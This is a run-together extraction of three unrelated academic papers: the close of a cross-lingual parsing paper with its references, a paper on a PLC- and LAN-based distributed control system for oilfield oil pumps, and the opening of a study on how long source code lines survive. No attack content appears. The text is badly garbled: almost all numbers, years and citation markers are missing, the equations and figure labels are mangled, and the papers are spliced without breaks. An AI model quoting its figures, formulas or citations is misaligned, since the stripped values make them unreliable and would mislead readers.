( ) were the first to intro- duce the idea of learning models for more than a dozen truly low-resource languages in one go, and our contribution can be seen as a non-trivial exten- sion of theirs. parsing with the exception of zeman and resnik ( ), initial work on cross-lingual dependency parsing focused on annotation projection (hwa et al., ; spreyer et al., ). mcdonald et al. ( ) and søgaard ( ) simultaneously took up the idea of delexicalized transfer after zeman and resnik ( ), but more importantly, they also intro- duced the idea of multi-source cross-lingual transfer in the context of dependency parsing. mcdonald et al. ( ) were the first to combine annotation pro- jection and multi-source transfer, the approach taken in this paper. annotation projection has been explored in the context of cross-lingual dependency parsing since hwa et al. ( ). notable approaches include the http://www.ohchr.org/en/udhr/pages/ searchbylang.aspx http://opus.lingfil.uu.se/ http://www.ohchr.org/en/udhr/pages/searchbylang.aspx http://www.ohchr.org/en/udhr/pages/searchbylang.aspx http://opus.lingfil.uu.se/ soft projection of reliable dependencies by li et al. ( ), and the work of ma and xia ( ), who make use of the source-side distributions through a training objective function. tiedemann and agić ( ) provide a more de- tailed overview of model transfer and annotation projection, while introducing a competitive machine translation-based approach to synthesizing depen- dency treebanks. in their work, we note the ibm word alignments favor more closely related lan- guages, and that building machine translation sys- tems requires parallel data in quantities that far sur- pass ebc and wtc combined. the best results reported to date were presented by rasooli and collins ( ). they use the inter- section of languages represented in the google de- pendency treebanks project and the languages rep- resented in the europarl corpus. consequently, their approach—similar to all the other approaches listed in this section—is potentially biased toward closely related indo-european languages. conclusions we introduced a novel, yet simple and heuristics- free, method for inducing pos taggers and depen- dency parsers for truly low-resource languages. we only assume the availability of a translation of a set of documents that have been translated into many languages. the novelty of our dependency projec- tion method consists in projecting edge scores rather than edges, and specifically in projecting these anno- tations from multiple sources rather than from only one source. while we built models for more than a hundred languages during our experiments, we eval- uated our approach across languages for which we had test data. the results show that our approach is superior to commonly used transfer methods. acknowledgements we thank the editors and the anonymous reviewers for their valuable comments. this research is funded by the erc starting grant lowlands (# ). references željko agić, dirk hovy, and anders søgaard. . if all you have is a bit of the bible: learning pos tag- gers for truly low-resource languages. in acl. thorsten brants. . tnt: a statistical part-of- speech tagger. in anlp. christos christodouloupoulos and mark steedman. . a massively parallel corpus: the bible in languages. language resources and evaluation, ( ). dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based pro- jections. in acl. chris dyer, victor chahuneau, and noah a. smith. . 
a simple, fast, and effective reparameteriza- tion of ibm model . in acl. dan garrette, jason mielens, and jason baldridge. . real-world semi-supervised learning of pos- taggers for low-resource languages. in acl. rebecca hwa, philip resnik, amy weinberg, clara cabezas, and okan kolak. . bootstrapping parsers via syntactic projection across parallel texts. natural language engineering, ( ). anders johannsen, željko agić, and anders søgaard. . joint part-of-speech and dependency projec- tion from multiple sources. in acl. shen li, joão graça, and ben taskar. . wiki-ly supervised part-of-speech tagging. in emnlp. zhenghua li, min zhang, and wenliang chen. . soft cross-lingual syntax projection for dependency parsing. in coling. xuezhe ma and fei xia. . unsupervised depen- dency parsing with transferring distribution via par- allel guidance and entropy regularization. in acl. andré f. t. martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non-projective turbo parsers. in acl. ryan mcdonald, koby crammer, and fernando pereira. . online large-margin training of dependency parsers. in acl. ryan mcdonald, slav petrov, and keith hall. . multi-source transfer of delexicalized dependency parsers. in emnlp. ryan mcdonald, joakim nivre, yvonne quirmbach- brundage, yoav goldberg, dipanjan das, kuzman ganchev, keith hall, slav petrov, hao zhang, oscar täckström, claudia bedini, núria bertomeu castelló, and jungmee lee. . universal dependency an- notation for multilingual parsing. in acl. joakim nivre, željko agić, maria jesus aranzabe, masayuki asahara, aitziber atutxa, miguel balles- teros, john bauer, kepa bengoetxea, riyaz ah- mad bhat, cristina bosco, sam bowman, giuseppe g. a. celano, miriam connor, marie-catherine de marneffe, arantza diaz de ilarraza, kaja do- brovoljc, timothy dozat, tomaž erjavec, richárd farkas, jennifer foster, daniel galbraith, filip gin- ter, iakes goenaga, koldo gojenola, yoav gold- berg, berta gonzales, bruno guillaume, jan hajič, dag haug, radu ion, elena irimia, anders jo- hannsen, hiroshi kanayama, jenna kanerva, simon krek, veronika laippala, alessandro lenci, nikola ljubešić, teresa lynn, christopher manning, cătălina mărănduc, david mareček, héctor martı́nez alonso, jan mašek, yuji matsumoto, ryan mcdonald, anna missilä, verginica mititelu, yusuke miyao, simon- etta montemagni, shunsuke mori, hanna nurmi, petya osenova, lilja Øvrelid, elena pascual, marco passarotti, cenel-augusto perez, slav petrov, jussi piitulainen, barbara plank, martin popel, prokopis prokopidis, sampo pyysalo, loganathan ramasamy, rudolf rosa, shadi saleh, sebastian schuster, wolf- gang seeker, mojgan seraji, natalia silveira, maria simi, radu simionescu, katalin simkó, kiril simov, aaron smith, jan štěpánek, alane suhr, zsolt szántó, takaaki tanaka, reut tsarfaty, sumire uematsu, lar- raitz uria, viktor varga, veronika vincze, zdeněk žabokrtský, daniel zeman, and hanzhi zhu. . universal dependencies . . robert östling. . word order typology through multilingual word alignment. in acl. slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in lrec. mohammad sadegh rasooli and michael collins. . density-driven cross-lingual transfer of depen- dency parsers. in emnlp. rudolf rosa and zdeněk žabokrtský. . klcpos : a language similarity measure for delexicalized parser transfer. in acl. kenji sagae and alon lavie. . parser combination by reparsing. in naacl. kathrin spreyer, lilja Øvrelid, and jonas kuhn. . 
training parsers on partial trees: a cross-language comparison. in lrec. anders søgaard. . data point selection for cross- language adaptation of dependency parsers. in acl. jörg tiedemann and željko agić. . synthetic tree- banking for cross-lingual dependency parsing. jour- nal of artificial intelligence research, . jörg tiedemann, željko agić, and joakim nivre. . treebank translation for cross-lingual parser induc- tion. in conll. jörg tiedemann. . parallel data, tools and inter- faces in opus. in lrec. jörg tiedemann. . rediscovering annotation pro- jection for cross-lingual parser induction. in col- ing. dániel varga, lászló németh, péter halácsy, andrás ko- rnai, viktor trón, and viktor nagy. . parallel corpora for medium density languages. in ranlp. david yarowsky, grace ngai, and richard wicentowski. . inducing multilingual text analysis tools via robust projection across aligned corpora. in naacl. daniel zeman and philip resnik. . cross-language parser adaptation between related languages. in ijcnlp workshop on nlp for less privileged lan- guages. (shengquan yang) research of virtual classroom’s collaborative mechanism based on petri net international conference on sensor network and computer engineering (icsnce ) research of distributed control system for oilfield oil pump based on plc and lan shengquan yang school of computer science and engineering xi'an technological university xi'an, china e-mail: xaitysq@ .com chen gong school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com abstract—in order to change the current bad situation such as the high cost of manpower, the failure to deal with the fault in time and the low management efficiency, etc. in oilfield oil pump measure and control, this paper puts forward the research and development of oilfield oil pump distributed control system based on plc and lan. firstly this paper describes the operation principle of oil pump equipment and gives its network topology model. secondly it designs the system macro distributed structure framework with layers: pump layer, plc layer, ipc layer and rcc layer in detail. finally the paper discusses the design of the software system including the plc on-site field measure and control software subsystem, the ipc local session software subsystem and the rcc remote management software subsystem. keywords-oil pump; plc; lan; distributed control i. introduction oil pump is an important core production power equipment for oil pipeline of oilfield enterprises. the traditional oil pump adopts manual inspection or computer combined with gauges and instruments, and local single- point auxiliary measurement and control [ ]. most of the oil pumps are arranged in unhindered and wild mountains and are huge in number. the traditional way of measurement and control will inevitably cause the high cost of manpower and low management efficiency of the oil field enterprises, equipment oil transport failures often occur while the pump equipment can not work normally because maintenance personnel are far from the workplace of the malfunction and it can not be processed in time, which causes crude oil leaks or production stagnation. programmable logic controller (plc) is a microelectronic program control device which has strong anti-jamming performance and high stability and supports complex logic, data processing and network communication. 
industry personal computer (ipc) is a full-fledged computer that supports industrial production process control, data storage, graphic display, dynamic curve and other functions under harsh industrial environment [ ]. because the production site is extremely dispersed irregularly, usually away from the site management office. with the help of local area net (lan), we can transmit the control pictures of ipc in the oil pump field at the same time to the oil pump equipment operating engineer's office to achieve real-time view and control. the local oil pump can be unattended, and can be found immediately and promptly sent to the site if there is a fault alarm. therefore, the study adopts field plc, ipc and lan on local enterprise to achieve the local and remote joint measurement and control of multi oil pump. the local oil pump firstly can be controlled initially by autonomous operation, and the remote center can control the multi spot on the spot in real time. this is a distributed control structure which can achieve the advantages of highly centralized management and decentralized control. this is of great significance for the oil field enterprises which can make the global oil pipeline equipment run safely, facilitate the remote management operation, reduce the manpower cost and improve the operation efficiency. ii. operation principle of oil pump equipment figure . oil pump operating process diagram the oil delivery pump system is mainly composed of a mechanical base, an oil delivery main pump, an oil delivery backup pump, a switch two position valve, an analog regulating valve, a three way switcher, an accident buffer tank, a mechanical pipeline, a frequency converter and various sensors [ ]. its function is to filter, heat up, buffer the general organ imports crude oil the failure accident temporary cache tank the three-way switch the oil delivery main pump the oil delivery backup pump the external output oil pipeline the site crude oil depot the crude oil filter international conference on sensor network and computer engineering (icsnce ) and pressurized the crude mixture which is sent from the general authority (or the wellhead) through the pipeline, and then transport it to the site oil depot according to the suitable flow rate. its operation principle of oil transportation is shown in figure . first of all the crude oil mixture which sent by the general organ or the pumping unit, through the mechanical pipeline to the crude oil filter to filter out the granular impurities, such as soil, slag, and so on. then according to the set of oil transportation process, the three-way switch is sent to the main oil pump or the oil backup pump, and the crude oil is regulated to the appropriate outlet pressure through the oil pump, and then transported to the original oil depot through the external output oil pipeline. because the flow and pressure of the total mechanism fluctuate greatly, the system needs intelligent control through the algorithm to the main pump or the pump frequency converter, to ensure the constant pressure of external transmission. if the external transmission pressure is too small, the external distance will not have motive force to run. otherwise the pressure is too high, which will cause the ecological disaster, such as the leakage of the oil pipeline and other ecological disasters. if the pressure of oil which come from the total mechanism is too high beyond the tolerance range of pump or filter clogging. 
then it need to cut off the entrance to the oil pump, and make oil tank failure directly into the cache. the crude oil level fault tank inside the cache reaches a certain height and then through the oil pump output out. iii. network topology and macro structure of distributed measurement and control system for oil pump according to surveying the distribution of oil pump in changqing oil field, daqing oilfield and yanchang oil field, they are most regularly distributed in the wilderness. no matter the size of the oil field, their physical equipment and technology are basically the same, and an oil field generally is made up of several #, #... n# oil pump. in the follow-up article content the network topology is designed firstly, and the overall macro structure is further designed. a. topology design of system network according to the characteristics of the operation process of the oil pump and the objective reality of the dispersion distribution of the multi-pump, a network topology of the oil pump remote measurement and control system as shown in figure is designed. this system is a typical star topology. all peripheral terminals ipc are connected to a remote control center (rcc) computer through an enterprise lan router. this central node manages the access and control of multiple distributed terminal nodes, and forms a distributed control system based on the network (ndcs), which is an extended application of the traditional dcs theory [ ]. ndcs adopts the basic design idea of centralized management, centralized operation, dispersive measurement and decentralized control, and adopts the structure form of multi-layer classification and network communication. figure . oil pump distributed measurement and control network topology b. overall macro structure of system remote measurement and control according to the characteristics of the network topology and the detailed requirements for the measurement and control of the oil pump, and following the principle of top- down and gradual subdivision, we have designed the overall macrostructure of the system ndcs as shown in figure . the whole system is designed in a hierarchical way. there are four levels. the whole system is pump layer (sensor layer), plc layer (control layer), ipc layer (conversation layer) and rcc layer (management layer) from below [ ]. the specific description is as follows: ) the bottom of the system is the oil pump layer, that is, the pump layer is also known as the sensing layer. oil pump is the measure and control object of the whole system, composed of various sensors and actuators, including pressure, temperature, liquid level, flow rate, switch and other sensing signal input, main pump and standby pump start and stop switch output, three-way valve regulating opening size, analog output and digital frequency control of oil pump frequency converter. ) the middle and lower layer of the system is the plc layer, also known as the control layer. plc consists of cpu, rs , rj , and extension modules. the extension module includes the switch quantity i/o unit, the analog input a/d unit, the analog output d/a unit, all of which are connected with the cpu through the internal bus. rs is embedded in the external communication bus on the cpu unit. it is based on the standard modbus rtu and inverter to control the serial communication [ ]. rj is the standard ethernet port on the cpu unit, which is connected to the upper middle ipc mainly through the fins net protocol. 
) the upper and middle layer of the system are #, #, …n# ipc layer which consists of local ipc of the oil pump. on the one hand, the ipc layer carries on the local measurement and control through the fins net to plc's conversation. on the other hand, it transfers the local data or accepts the rcc remote control instruction through the international conference on sensor network and computer engineering (icsnce ) conversation between the enterprise lan and the top rcc, so it is also called the conversation layer. figure . oil pump control system hardware macro structure ) the top layer of the system is the rcc level. it can perform data acquisition, curve display, early warning analysis, dynamic process picture, parameter setting and other functions for all oil pumps, it realizes the remote centralized operation and management of the oil pump group through the network, so it is also called the management layer. designing the remote distributed centralized control of the oil pump into different arrangements, each layer requires a different software subsystem to implement separately, the upper and lower layers connect through the hardware circuit and the software api interface function, software subsystems of different layers can be studied and developed in parallel. this not only reduces the complexity of the overall system, but reduces the development cycle. iv. distributed control system software for oil pump in the hardware layering of the system besides the pump layer sensor has a standard circuit interface, so it does not require programming. the other layers need to design the corresponding software subsystems separately, which includes: the field plc field measurement and control software subsystem, the ipc local session software subsystem and the rcc remote management software subsystem. a. the field plc field measurement and control software subsystem this system uses cj m- plc as the field oil pump controller which comes from a famous omron company in the field of automation, of which software development uses the cx-program v . integrated development environment. using the ladder graph lad that follows the iec standard and compiling the scl-st language, five cyclic control scl-st subroutines are designed, and its plc main ladder lad program is shown in figure . figure . plc main ladder diagram lad program each cycle control subprograms are executed periodically under main control scheduling that implements the management of their start-up, concurrency, synchronization, and stop. the detailed description of the content is as follows: ) data collection circular subroutine analogwork: completing acquisition of module data such as multiple analog ad -v , switch quantity id and so on. these data acquisition needs to be filtered and remove the interfering data and store it in the dm area. 
the system uses external serial communication tcp / ip remote access n# pump local ipc (local hmi) oil pump remote control center computer (rcc) lan n # pump local programmable logic controller (cpu) plc external fins net communication a/d unit d/a unit i/o unit in le t o u tle t p re ssu re se n so r p u m p te m p e ra tu re se n so r o u te r o u tle t flo w se n so r a c c id e n t b u ffe r le v e l se n so r m a in th re e -w a y sw itc h b a c k u p th re e -w a y sw itc h p u m p s o n /o f f o p e ra tio n s o le n o id v a lv e o u tp u t sw itc h p u m p s o n /o f f s ta te in p u t plc internal bus plc internal bus m a in p u m p fre q u e n c y b a c k u p p u m p fre q u e n c y rs rj # pump local ipc (local hmi) …… # oil pump plc international conference on sensor network and computer engineering (icsnce ) the rc low pass filter for smoothing the data, and its mathematical transfer function is: )( )( )(   f s tsx sy g , tf=rc is the time constant of the filter, dispersing the mathematical function to obtain the plc, the difference algorithm formula for its implementation is: y(n)= α y(n- )+( - α )x(n), tt t f f  α ,t is the sampling period, x (n) is the current nth sample, y (n) is the current filter result data of the nth. ) logic control loop processing subroutine logicmodule: completing all the internal logic control functions of the system, it has a raw rule library inside. written by the plc st language, the rule form is the former condition (the execution condition) a - the following condition b (regular body), condition a and b can also be compound logical expressions composed of operators such as not, and, or, xor and so on. a represents the logical operation conditions, and b represents processing. for example: if mainpumprun and oilpressurehigh then setalarmon and setpause on, of which expression means that when the main pump is running and the pressure is too high, plc immediately outputs the alarm and pause the system. ) pressure pid control loop subroutine pidwork: completing the frequency pid control of the frequency converter , that is to use the pid algorithm to control the speed of the main pump or the pump to achieve the outlet pressure in line with the pressure curve set by the oil pump process. the differential equation of the pid control algorithm in plc is [ ]:         t d i p dt tde tdtte t tektmv )( )( )()( in the formula, )()()( tpvtsvte  is a deviation, it represents the running time of the controller, the ti is the integral coefficient, the td is the differential coefficient, and the kp is the ratio coefficient, mv(t) indicates the output of the output t time of the algorithm. this subsystem uses scl- st code programming to achieve incremental pid control in omron plc, when running, select the appropriate proportion p, integral i, differential d parameters, and of course you can also call plc built-in pid instructions to achieve. ) three - way switcher control loop subroutine davalvectl: completing flow control of oil pump, on the one hand it controls the da output of the three - way valve, on the other hand it controls the oil pump to be executed automatically according to the selected process. the main control processes are varied. according to time plan timeplan to performs the main standby pump in turn, and it performs pump according to the flow plan fluxplan, and executes pumps in turn according to the oil pump temperature plan tempplan and so on. 
) communication response loop subroutine commwork: on the one hand it handles the rs serial communication with the frequency converter at the sensing layer, and on the other hand it prepares the rj ethernet communication with the upper ipc. communication between the plc and the frequency converter follows the standard modbus rtu protocol; its command frame format is shown in table i (rtu transmission mode command frame format: slave address, function code, a variable-length data field, and a crc checksum). communication between the plc and the ipc over the rj port complies with the fins tcp industrial ethernet standard, which is compatible with ethernet, controller link and sysmac link network systems [ ]; its protocol format adds a fins header to traditional tcp/ip. b. ipc local session software subsystem the oil pump ipc local session software subsystem is developed in an object-oriented (oop) integrated environment and implemented with a multi-thread programming mechanism. according to the functions of the system, the multithreading workflow of the ipc local session subsystem is designed as shown in figure . considering that the oil pump is a piece of special, key equipment in oilfield enterprises, the users of the system include oil pump technicians, equipment safety personnel, ordinary operators, and system administrators, who have different tasks in oil pump operation; the subsystem therefore adopts a role-based access mechanism in which different roles have different permissions when accessing the system. a user-role management thread selects, through the role-permission interface, the running interface appropriate to each role. the other threads run in parallel, each with its own cruntimedata space that does not interfere with the others, and concurrently complete: downlink real-time rj fins communication with the plc, uplink tcp/ip communication with the remote rcc, oil pump data processing and record storage, oil pump dynamic curve display, and plc operating parameter viewing and setting.
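the following python rendering (illustrative only; the plc code itself is written in scl-st) sketches two of the cyclic subroutines described above: the first-order low-pass smoothing used by analogwork and one common incremental form of the pid step used by pidwork; the filter time constant, sampling period, and pid gains below are hypothetical placeholders.

def lowpass_step(y_prev, x, t_f, t_sample):
    # first-order rc filter: y(n) = a*y(n-1) + (1-a)*x(n), with a = tf/(tf+t)
    a = t_f / (t_f + t_sample)
    return a * y_prev + (1.0 - a) * x

def pid_incremental(e, e1, e2, kp, ti, td, t_sample):
    # one common discrete incremental pid form: returns the change in output
    # delta_mv from the current error e and the two previous errors e1, e2
    return kp * ((e - e1) + (t_sample / ti) * e + (td / t_sample) * (e - 2 * e1 + e2))

# toy usage: smooth an outlet-pressure sample, then adjust the inverter output
y = lowpass_step(y_prev=3.10, x=3.25, t_f=2.0, t_sample=0.5)
delta_mv = pid_incremental(e=0.15, e1=0.10, e2=0.08, kp=1.2, ti=8.0, td=0.5, t_sample=0.5)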
it is more than the ipc local subsystem to manage and dispatch the threads of the production and operation of all oil transport pumps and the thread of the remote safety decision analysis of the global oil transmission equipment, and the other is similar to the ipc local subsystem, which is limited to the length of the text. the rcc remote management software subsystem focuses on the global remote control management function, then it can collect all the data of the oil pump, and then carry out large data analysis and process data mining, adopts a data mining algorithm based on classical apriori algorithm for association rules. the main code is as follows: procedue oilpumpapriori(lk); begin l ={large -itemsets}; for (k= ; lk- <>; k++) do begin ck=apriori_gen(lk- ); for all transactions td do begin ct=subset(ck,t); for all candiates cct do c.count= c.count+ ; end lk={ cck|c.countmin_sup } end; l= kk l ; end. v. conclusion by using an object-oriented integrated development environment in the windows operating system, embarcadero rad studio xe、cx-program v . and open source network database mysql . , the distributed measurement and control system of oil delivery pump based on plc and lan is successfully developed. the system has been successfully applied in a chinese oil field enterprise, and the actual development of rcc remotely the human- machine interface of one of the stations in which the oil pump operates as shown in figure . after a year of feedback from the company, it shows that the system has high information level, reduced the difficulty of multi pump collaborative management, improved the efficiency of equipment safety management, and greatly reduced the operation cost of oil production. this article putted forward the remote control system which uses lan and plc to design in a hierarchical manner, and it simplifies the problem of complex equipment measurement and control. so it provides a better design method and model for remote control of similar equipment and has a strong practical application and promotion value. oil pump ipc user role management thread plc operating parameters view set thread select interface thread based on role pump dynamic trend curve show thread pump dynamic process screen show thread pump data processing records stored thread uplink tcp / ip communication processing thread downlink rj communication processing thread international conference on sensor network and computer engineering (icsnce ) figure . rcc remote site oil pump process operation interface acknowledgment the research is supported by the new network and detection control national and local joint engineering laboratory. (financing projects no. gsysj ). references [ ] cui hai-li, zhao hai-jun, chen peng, “oil pump performance detection and fault analysis,” petro-chemical equipment, vol. , pp. - , april [ ] wang li-wen, chen yuan-jun, chen bin, “aircraft ground deicing monitoring system based on gprs and plc,” computer engineering and design, vol. , pp. - , aguest [ ] zhang nai-lu, li yong-jin, zhang yu-xiang, “gas station integrated information monitoring system based on internet of things,” microelectronics & computer, vol. , pp. - , february [ ] qi lei, han zhe, chen shuang, chen zhao, “design and realization of the measuring and controlling system of vacuum making wave machine based on s - ethernet communication,” industrial instrumentation & automation, vol. , pp. 
- , march [ ] wu qiu-yang, li tian-ping, “improvement and application of dcs gas-fried oven temperature control system,” journal of shandong normal university(natural science), vol. , pp. - , march [ ] e.b.priyanka, c.maheswari, b.meenakshipriya, “parameter monitoring and control during petrol transportation using plc based pid controller,” journal of applied research and technology, vol. , pp. - , february software evolution: the lifetime of fine-grained elements software evolution: the lifetime of fine-grained elements diomidis spinellis , , panos louridas and maria kechagia department of management science and technology, athens university of economics and business, athens, greece department of software technology, delft university of technology, delft, the netherlands department of computer science, university college london, london, uk abstract a model regarding the lifetime of individual source code lines or tokens can estimate maintenance effort, guide preventive maintenance, and, more broadly, identify factors that can improve the efficiency of software development. we present methods and tools that allow tracking of each line’s or token’s birth and death. through them, we analyze . billion source code element lifetime events in revision control repositories. statistical analysis shows that code lines are durable, with a median lifespan of about . years, and that young lines are more likely to be modified or deleted, following a weibull distribution with the associated hazard rate decreasing over time. this behavior appears to be independent from specific characteristics of lines or tokens, as we could not determine factors that influence significantly their longevity across projects. the programing language, and developer tenure and experience were not found to be significantly correlated with line or token longevity, while project size and project age showed only a slight correlation. subjects programming languages, software engineering keywords software evolution, code decay, software aging, hazard rate, repository mining introduction although there is a significant body of work regarding the macroscopic characteristics (gonzález-barahona et al., ) and even laws (lehman, ) of software evolution (herraiz et al., ), much less is known about how software evolves at the microscopic scale, namely at the level of lines, statements, expressions, and individual tokens. a study of such details, apart from its self-supporting merits as curiosity-driven empirical research, can derive results that can in the future be used for improving software development processes (humphrey, , p. ), architecting software systems (barnes, pandey & garlan, ; breivold, crnkovic & larsson, ), developing machine learning algorithms (allamanis et al., ; alon et al., ), organizing software development teams (rodríguez et al., ), estimating maintenance effort (albrecht & gaffney, ; atkins et al., ; zimmermann et al., ), designing new features for configuration management systems (white et al., ; jiang, armaly & mcmillan, ), locating software faults (cotroneo, natella & pietrantuono, ; giger, pinzger & gall, ; kechagia et al., ; salfner, lenk & malek, ), guiding probabilistic programing (gordon et al., ), and enhancing programing languages (vallée-rai et al., ). here we report on methods, tools, and the results we obtained by studying the lifetime of how to cite this article spinellis d, louridas p, kechagia m. . software evolution: the lifetime of fine-grained elements. peerj comput. sci. :e doi . /peerj-cs. 
submitted november accepted january published february corresponding author diomidis spinellis, dds@aueb.gr academic editor philipp leitner additional information and declarations can be found on page doi . /peerj-cs. copyright spinellis et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:dds@�aueb.�gr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ unmodified code lines and tokens in revision control repositories over . billion source code element lifetime events. at the point where the rubber hits the road, software consists of code lines. their number has been extensively studied to gain insights on topics ranging from development effort (albrecht & gaffney, ; gousios, kalliamvakou & spinellis, ; lind & vairavan, ) and quality (buse & weimer, ; kan, ; stamelos et al., ; zhang, ) to software growth (van genuchten & hatton, ; godfrey & tu, ; hatton, spinellis & van genuchten, ; herraiz, gonzález-barahona & robles, ). this work contributes to the study of software evolution by looking quantitatively, not at changes in the number of code lines, but how and why individual lines or tokens change over the software’s lifetime. first, consider how long a line of code survives in its initial form. as software evolves over time, some lines are added, others are deleted, and existing ones are modified. from the time that a line enters the code base of a project, for how long does it live, that is, for how long does it remain there unchanged? are lines of code more of a durable asset that will be around for the long time, or are they more like perishable assets, that will only remain for a short time? how is their lifetime related to factors such as a system’s size or the employed programing language? a process model of aging can be further elaborated through quantitative characteristics. these include the mathematical function that determines when existing lines are likely to “die”. we define as the line’s death its deletion or the modification of its non-whitespace elements, and further examine the validity of this construct by also looking at the lifetimes of individual tokens. in functions that are used to characterize decay processes, their characteristic unit is often expressed through the measure of median lifespan: t½. if a line i is added at time ti, and is changed or disappears at time ti; , its lifespan is ti, − ti, . the median lifespan, over all lines of a project, is the median value of all line lifespans, that is, the median of ti, − ti, for all i. now take an added line of code. when will this code be changed or be entirely removed and how does its age factor into this question? one can imagine three possibilities. the first, a high infant mortality scenario, in which new lines of code are often changed as developers fix newly-introduced faults and refactor the code. the second, a senescence scenario, has code lines become outdated and less useful as they age and therefore face increasing chances of being replaced. the third, stochastic scenario, has lines getting replaced mostly due to other factors through what appears to be a random process with regard to their age. in practice, it is likely that all three scenarios play a role, but it is still possible that one of them dominates the aging process. 
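these scenarios can be distinguished quantitatively. the sketch below (illustrative only, operating on hypothetical toy data rather than the study's dataset) computes the median lifespan t½ defined above and fits a weibull shape parameter with scipy; a fitted shape below one corresponds to the infant mortality scenario (hazard decreasing with age), a shape of one to the purely stochastic scenario, and a shape above one to senescence. note that the sketch ignores the right-censoring of still-alive lines, which a full survival analysis would have to take into account.

import numpy as np
from scipy import stats

seconds_per_year = 365.25 * 24 * 3600

def median_lifespan_years(events):
    # events: iterable of (t_birth, t_death) timestamps for lines that died
    spans = np.array([t_death - t_birth for t_birth, t_death in events], dtype=float)
    return np.median(spans) / seconds_per_year

def weibull_shape(events):
    spans = np.array([t_death - t_birth for t_birth, t_death in events], dtype=float)
    shape, _loc, _scale = stats.weibull_min.fit(spans, floc=0)
    return shape

# hypothetical toy data: three lines that lived 0.5, 2, and 6 years
toy = [(0, 0.5 * seconds_per_year), (0, 2 * seconds_per_year), (0, 6 * seconds_per_year)]
print(median_lifespan_years(toy), weibull_shape(toy))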
finally, consider some reasons for which a line may change. these include misunderstood requirements, a fault in the code, or changes cascading from other work. while these are typically qualitatively analyzed, one can also examine the factors associated with them, such as the line’s complexity, its developer’s seniority, the project’s size, or the employed programing language. apart from its theoretical importance, a model of code aging at the level of code lines is useful in several ways. many potential applications are listed in the opening paragraph; spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ here are two concrete examples. first, the model can inform managers where to direct maintenance effort, for example to reduce the acquired technical debt (kruchten, nord & ozkaya, ) or address newly-discovered security vulnerabilities (ozment & schechter, ; penta, cerulo & aversano, ; shin et al., ). under the infant mortality scenario old lines are likely to remain in a project for ages, so they should periodically receive some love and care to keep them up to date with modern practices. in contrast, under the senescence scenario these will gradually fade away, so effort invested in maintaining them may be wasted. second, the function expressing code age and its coefficients for a specific project can be used to guide maintenance effort estimation. this is important because humans are often biased when estimating development effort (løhre & jørgensen, ). simplistically, effort is often measured in terms of code lines (albrecht & gaffney, ; gousios, kalliamvakou & spinellis, ; lind & vairavan, ). therefore, if, given the age of existing lines, we can estimate how many of the project’s lines are likely to change in the next year, this, together with the project’s estimated code growth rate (hatton, spinellis & van genuchten, ), can roughly determine the required development effort. more broadly and importantly, given that code lines require effort to change, identifying and controlling factors that promote longer- living lines—for instance through better abstraction mechanisms—can direct improvements in software development efficiency. the contributions of this article are the development of an efficient method and tools that allow the tracking of the birth and death of individual source code lines and tokens over periods that can span decades and the empirical analysis of . billion source code element lifetime events to answer the following research questions. rq for how long does a line of code or token live? the answer to this question determines whether code elements are durable or perishable. rq how is a line’s or token’s age related to the probability of its change or deletion? the answer tells us whether younger code elements are more vulnerable to change and deletion (infant mortality), or whether older ones are more frail (senescence), or whether there are no age-related hazards. rq what other product or process factors may influence a line’s or a token’s survival? we investigate this question along the following dimensions. rq a the line’s characteristics, which may reveal change-prone programing constructs or drivers of change. rq b the different token types, which may affect the lifetime of the tokens. rq c the committer’s experience and tenure; one might expect senior developers to write more stable code. rq d the project’s size, which might lend it inertia against change. 
rq e the employed programing language, demonstrating whether some programing languages lend themselves for writing more stable (or, alternatively, flexible) code. methods we studied code aging at the level of individual source code lines by selecting a number of suitable revision control repositories to study, coming up with a way to handle merges of spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ development branches, constructing a tool that can track the lifetime of individual lines across successive software releases, creating a process and tools to also study the lifetime of individual tokens, choosing the statistical methods that best suited the domain, and applying them to the collected data. as recommended by ince, hatton & graham-cumming ( ), the source code and data associated with our results are openly available online. material selection we ran our study on open source software repositories due to their liberal availability and the fact that this simplifies the replication of our findings. we selected the revision control repositories to study based on five objective criteria consistent with our research goals. github hosting we only selected projects whose history is available on github. this decision simplified the methods we used to select the projects and to traverse a project’s revisions. the choice to use only github-hosted repositories is not as restrictive as it sounds, because nowadays even projects that use other version control systems and hosting often make a (typically read-only) git version of their repository available on github. longevity we selected projects with at least ten years of commit data in order to obtain enough samples for statistical analysis. active development the code in the repository had to be actively developed as determined by code commits. obviously, code in dormant projects does not exhibit aging processes and cannot be usefully modeled. to examine projects that are actively developed we calculated the number of weeks over the project’s lifetime in which at least one commit had occurred. we then selected projects in which commits occurred in at least % of the weeks to take into account vacation time. we examined activity at weekly granularity, because some open source developers may only work over weekends. popularity we selected projects having at least github “stars”. results from popular projects are likely to be relevant to more people than those from obscure ones. studying code aging in small test projects or student exercises is less likely to yield results of industrial relevance. programming language to study source code evolution at the level of individual tokens as well as lines, we only selected projects whose main programing language, as reported in ghtorrent (gousios & spinellis, ), is supported by the tokenizer we used (spinellis, ). these languages were selected based on their popularity among the projects selected using data: https://doi.org/ . /zenodo. ( . gb compressed, gb uncompressed); source code: https://doi. org/ . /zenodo. . spinellis et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /zenodo. https://doi.org/ . /zenodo. https://doi.org/ . /zenodo. https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the other criteria, and cover % of the repositories initially selected. the languages processed are c, c#, java, php, and python. 
